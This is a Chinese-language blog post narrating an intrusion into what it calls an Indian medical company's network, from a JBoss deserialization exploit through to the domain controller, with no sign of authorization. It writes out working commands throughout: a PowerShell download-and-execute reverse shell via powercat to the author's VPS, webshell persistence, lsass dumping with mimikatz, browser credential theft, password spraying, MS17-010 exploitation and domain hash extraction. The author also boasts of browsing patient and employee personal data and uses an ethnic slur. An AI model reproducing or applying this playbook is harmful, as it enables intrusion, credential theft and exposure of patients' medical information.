前言
这次渗透测试是从一个CVE开始的,从阿三外网的Jboss打点到内网然后到域控,手法很简单常规,主要还是要扩展一下思路吧哈哈哈!

打点
首先对发现了该站点的JBoss页面,经过测试发现具有JBoss反序列化漏洞

61951-dvganqmzmv4.png

使用网上提供的EXP和利用方法,获取了一个shell。

03447-lstsigpujr.png

这里看到对方是windows系统,当前用户权限是管理员权限。并且该机器具有两张网卡,通向了两个网段,存在域环境
想直接上线cs多人运动,发现上线失败,机器也是出网的,尝试powershell,hta,exe wmi都不行,真的奇怪,对方机器并无杀软。

tasklist /svc

98025-c5u6yjnpj9s.png

这里就想着先拿一个稳定的shell,想往部署war包的路径写个冰蝎的马,
由于这个shell并不稳定 这里远程加载powercat脚本反弹到vps上

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ip -p 9000 -e cmd

在jboss/server/default/deploy/management/目录 echo写入 冰蝎的马子
windows下注意要使用^对尖括号进行转义 本地实验一下,成功

94757-wb4nf64lgvj.png

往目标机器写入 成功连接,very good

27217-bhhvhun2kxd.png

至此打点成功

本机信息收集
拿到webshell后先维权往其他几个目录也放几个webshell。防止被管理员删除修复。然后依托当前机器收集尽可能多的信息 迅速了解目标的内网大致网络结构和机器软件环境 为下一步继续深入做好准备

ipconfig /all &&netstat -ano &&arp -a  查看当前机器处于哪个环境哪个网段
wmic os get caption,csdversion,osarchitecture,version 抓明文之前了解目标系统版本 有些默认是抓不到明文的
wmic product get name,version 查看安装软件列表
whoami /user &&quer user 
tasklist /v && net start 
systeminfo

85370-8bbntcmksap.png

76658-3q8yjmacfqk.png

94094-xlu2xt96keo.png

可以看到当前我们获得的这台是win7企业版的主机 且处在域内。有2张网卡 通向2个网段
然后不断的翻资料,不断的翻资料
翻到这家企业的人力资源手册 wifi密码 网关 疑似oracle数据账号密码等信息

06996-5tzkwts0asm.png

把人力资源手册翻译看看 发现这是一家阿三的医疗私人有限公司 我的天

43737-0t3xtvchfyga.png

里面包括企业的政策及用人部分分配处分等信息
得到他的官网 www.sxxxx.com

72174-7956z3oadx6.png

把资料翻完之后 抓取一下浏览器记录及密码
使用hack-browser-data
抓取下来本地查看

03603-smbxbcbckjo.png

还是有很多有价值的密码的 把这些密码收集起来 还发现他用gmail邮箱注册了一个网站的账号 哇呜
然后登录查看一下这些网站的发现这台机的主人还有玩一些投资的平台哈哈哈,是位美女喔 具体是什么没深入下去

11969-tk9a1261is.png

有个网站引起了我的注意 登录发现这是一个挂号平台
可以查看大量患者人员的信息 并且可进行通话 这个操作真的太强了

01863-o2szwwlign.png

76083-3u8acid40xm.png

06883-kit9czudqjk.png

还有患者的家属情况人员信息 住院出院时间
然后尝试抓密码
prodump导出

procdump64.exe -accepteula -ma lsass.exe 1.dmp

29468-jig6k3hy66e.png

makecab c:\jboss\bin\1.dmp  1.zip

利用windows自带的压缩工具压缩一下然后下载回来

66228-pvae4drwu.png

离线mimikatz读取

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

60298-xc67xqbh2eq.png

我x!直接抓到域管账号administrator的密码,oh my god 我直呼好家伙
其实挺好奇的 看了一下该机器名 为EDP
接着百度了一下

55791-88mceir7f6y.png

emmmm 应该就是高层人员的意思吧,当前获取的是一名高层女主管机器
然后整理收集得到的密码 相对来说还是相对丰富的

域内信息收集

net group /domain 查看域组
net group "domain users" /domain 域内用户 
net group "domain admins" /domain 域管用户
net group "domain computers" /domain 域内机器 
net group "domain controllers" /domain域控机器
定位域控 

74911-d00p6nv1d0b.png

37011-b90f2tsnc6s.png

30628-oq5gxwqqdqk.png

84732-l7ipjhwff9f.png

内网大概300台左右

23253-rggjmg8oagf.png

可以看到域控的机器名为ADC1
通过Ipconfig /all 看到dns服务器为192.168.0.100该机器
通过ping 域名查看

85766-3z7kf1gcfhe.png

可以确认192.168.0.100为域控

gpp 查看共享组策略目录中是否存在密码
搜索存放在GPP目录中的各类明文的账号密码,共享组策略目录是域中最容易出现密码的地方,一般管理员会把一些bat脚本放在里面用来重置域内客户机器本地的administrator的密码
留意syslog netlogon

net time /domain
net view adc1
dir \\adc1\netlogon
dir \\adc1\syslog

59758-y73ml4bsx8d.png

但并无结果

获取域内spn记录
摸清域内敏感机器资产的分布。方便之后突破。
可以拿着这些获取到的机器名,来快速完整探测当前域内的所有存活主机
通过net view还是比较不准的 开启防火墙也是探测不到的

setspn -T xxx.com -Q */* >spn.txt

接着对拉回来的spn文件进行处理,获取spn记录前面的主机名字

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

76820-ekfc3p5kc44.png

通过SPN我们可以获取到域内的存活主机何一些主机的具体作用。可以通过主机的名字来获取到这个主机提供什么服务。
除了SPN收集域内的信息的话,还可以通过bloodHound来获取域内的一些信息。接着快速抓取当前域内的所有用户,组,会话,数据,上传exe文件上去然后再把数据给回去下来

内网存活机器及资产搜集
利用毒液venom代理

96415-3v59qjxyzxh.png

smb探测
挂socks5 msf里的smb_versionb模块 看当前你的网速 越快越准

setg Proxies socks5:ip:端口
setg reverseallowproxy true
set rhosts file:/home/kali/Desktop/ip.txt
set threads 15

30657-dtpwzbcfgvl.png

利用收集到的密码对内网机器进行批量smb弱口令探测 连接
整理出来

52218-jfs04qzakkh.png

还是收获很大的
对其他服务器进行弱口令探测
爆破出一台linux主机 一台windows主机查找文件 并无什么发现

13605-s78ertu74rp.png

48238-5dji8c6sdmu.png

探测内网web资产
内网jboss拿下8台
医院管理后台
尝试弱口令与之前的密码 无果

44609-4z2siwa3sbf.png

mirth connect 医疗信息接口集成引擎
admin/admin弱口令进入

49424-dby3mnt3sr9.png

对内网的Windows机器进行永恒之蓝渗透
对内网的主机进行MS17-010漏洞探, 通过venom把msf代入内网进行探测,发现了有很多主机都存在有永恒之蓝的漏洞

88213-9mkig7kcjwp.png

主机为64位 migrate迁移进程

05906-14xinbm8khx.png

利用Kiwi读取密码

01655-8dwg05qnyla.png

打下18台主机 其中包括hr docker icu的机器 想继续深度挖掘的 但是太累了哈哈哈!继续深度挖掘就抓密码读敏感文件 谷歌浏览器账号密码 一直反复拿到自己想要拿的资料为止吧!

98087-2vmlyqchbef.png

继续利用Kiwi读取密码
读取了4 5台后发现密码几乎一样 是站点域名@123 看来还是很多根据域名xxx@123等来设置密码的啊
那么我们可以尝试利用域用户来进行一波密码喷射看看效果如何

38046-0y9xoekr53o.png

可以看到还是非常多域内用户使用了该密码
这边使用wmiexec.py连接域控

python3 ./wmiexec.py sxxxx/Administrator:密码@192.168.0.100

57257-swsqi8rurok.png

发现开启3389尝试连接域控
成功连接

51666-bn9y8h6ng8n.png

06226-wf69iwajk5p.png

利用域管密码导出域内用户hash

99084-9g4u9ri5c5k.png

可以看到密码复用率非常高!!基本只有几个用户是有设置密码的

42592-9obc9t9ad77.png

总结
这次渗透测试来说还是挺顺利的
就是不断信息收集进行突破,真的是信息收集到一定程度时,已经能拿下很多机器了

后续
失败的溯源
在一个盘符里面看到了个bat文件 打开一看应该是前辈留下来的哈哈哈 看看能不能溯源一下

13664-iwery6dxyx.png

56737-zptwd39yh5p.png

可以看到这个应该是cs的https的监听端口
北京的xx云 这台估计就是前辈的c2服务器了吧!
通过威胁平台查看一下

70843-am7l32lgaq.png

66296-c570imqasnq.png

估计是dns解析上线cs 盲猜一波 后面3个估计是cs1 cs2 cs3
这里查不到邮箱等注册信息 是做了隐私保护吧!这里如果能查到注册者或者邮箱的话还可以进行下一步 但是后续通过搜索引擎对这个ip进行信息收集也并无什么成果 思路断

52746-4juyij1fto.png


本文由 wulaoban 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论